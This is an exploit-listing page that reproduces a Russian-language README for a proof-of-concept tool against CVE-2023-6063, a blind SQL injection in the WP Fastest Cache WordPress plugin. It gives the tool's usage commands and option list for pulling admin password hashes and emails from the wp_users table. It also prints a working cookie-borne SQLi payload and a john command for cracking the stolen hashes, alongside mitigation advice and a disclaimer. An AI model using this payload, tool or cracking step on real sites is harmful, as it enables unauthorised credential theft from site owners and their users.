Sploitus

Exploit for CVE-2023-6063-PoC

kitploit · 2026-09-04

Exploit Code

MARKDOWN139 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-INCOMMATOSE-CVE-2023-6063-POC
# PoC для CVE-2023-6063: WP Fastest Cache 1.2.2 Неаутентифицированная слепая SQL-инъекция

![Static Badge](https://img.shields.io/badge/Python-3.x-%2525233776AB%3Flogo=python?logo=python) ![Static Badge](https://img.shields.io/badge/License-GPLv3-red?logo=python) ![Static Badge](https://img.shields.io/badge/CVSS-7.5%20\(High\)-red)

Proof of Concept для CVE-2023-6063, уязвимости слепой SQL-инъекции на основе времени в WP Fastest Cache ≤1.2.2. Извлекает хэшированные пароли (`user_pass`) и email-адреса (`user_email`) из таблицы `wp_users`, злоупотребляя cookie `wordpress_logged_in`.

## Возможности

  * Извлечение данных на основе времени (посимвольно) через задержки SLEEP().
  * Поддерживает пользовательские cookie, имена пользователей и проверку хэша.



Этот скрипт извлекает:

  * ☑️ Хэши паролей WordPress (MD5/PHPass).
  * ☑️ Связанные email-адреса.
  * Аргументы командной строки для гибкого тестирования (--just-hash, --just-email, --debug).



### Использование

Установите зависимости (если не установлены):

root@kitploit:~
    
    
    pip install -r requirements.txt
    

Базовое использование:

root@kitploit:~
    
    
    python3 poc.py -u https://vulnerable-website.com --username admin --delay 5
    

Полный список опций:

root@kitploit:~
    
    
      -h, --help            показать это справочное сообщение и выйти
      -u URL, --url URL     Полный URL WordPress для тестирования CVE-2023-6063
      --username USERNAME   Определить пользователя для извлечения его хэшированного пароля
      -d DELAY, --delay DELAY
                            Время ожидания ответа веб-сервера, по умолчанию 5, минимум 2
      -H HASH, --hash HASH  Хэш для проверки в таблице wp_users, если хэш содержит специальные символы, используйте одинарные кавычки -> '<hash>'
      --domain DOMAIN       Имя домена для проверки email
      -c COOKIE, --cookie COOKIE
                            Укажите имя cookie, если оно отличается в вашем контексте
      --status-code STATUS_CODE
                            Использовать конкретный положительный статус-код, по умолчанию 200
      --debug               Более подробный вывод
      --just-hash           Извлекать только хэшированный пароль
      --just-email          Извлекать только email для пользователя
    

## 💻 Демонстрация

Это демонстрация для пользователя admin

https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890

Когда хэши паролей утекают, используйте `john` или `hashcat` для их расшифровки с помощью алгоритма `PHPass`, если пароль уязвим.

Пример с John:

root@kitploit:~
    
    
    john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
    

# 🕵️‍♂️ Технические детали

## 📖 Описание уязвимости

Плагин WP Fastest Cache (≤1.2.2) для WordPress уязвим к неаутентифицированной слепой SQL-инъекции через cookie wordpress_logged_in. Злоумышленники могут использовать этот недостаток для извлечения конфиденциальных данных (например, хэшей паролей, email-адресов) из таблицы wp_users, используя задержки на основе времени (SLEEP()) в SQL-запросах.

root@kitploit:~
    
    
    " AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -
    

🚨 Отказ от ответственности: Используйте эту информацию только для этичного тестирования безопасности с соответствующим разрешением. Несанкционированная эксплуатация незаконна.

  * CVE ID: CVE-2023-6063
  * Оценка уязвимости: 7.5 (Высокая)
  * Тип уязвимости: SQL-инъекция (слепая, на основе времени)
  * Затронутое ПО: WP Fastest Cache (плагин WordPress) ≤ v1.2.2



## 🔍 Вектор атаки

  * Эксплуатируемость: Удаленная (аутентификация не требуется)
  * Сложность атаки: Низкая (эксплуатируется через специально сформированные HTTP-запросы)



## 🔥 Влияние:

  * Конфиденциальность: Высокая (утечка учетных данных администратора)
  * Целостность: Нет
  * Доступность: Нет



## 📌 Затронутые версии

  * WP Fastest Cache versions ≤1.2.2



## 🛡️ Меры по смягчению

  * Обновите WP Fastest Cache до версии >1.2.2.
  * Обновите WP Fastest Cache до версии v1.2.3 или новее.
  * Примените правила WAF для блокировки полезных нагрузок SQLi в cookie.
  * **Отключите плагин, если он не используется.**



## 📚 Ссылки

  * Запись NIST NVD
  * Уведомление о плагине WordPress
  * Детали CVE



## ⚖️ Правовая информация

  * Этот скрипт предназначен только для образовательных целей. Всегда получайте явное разрешение перед тестированием.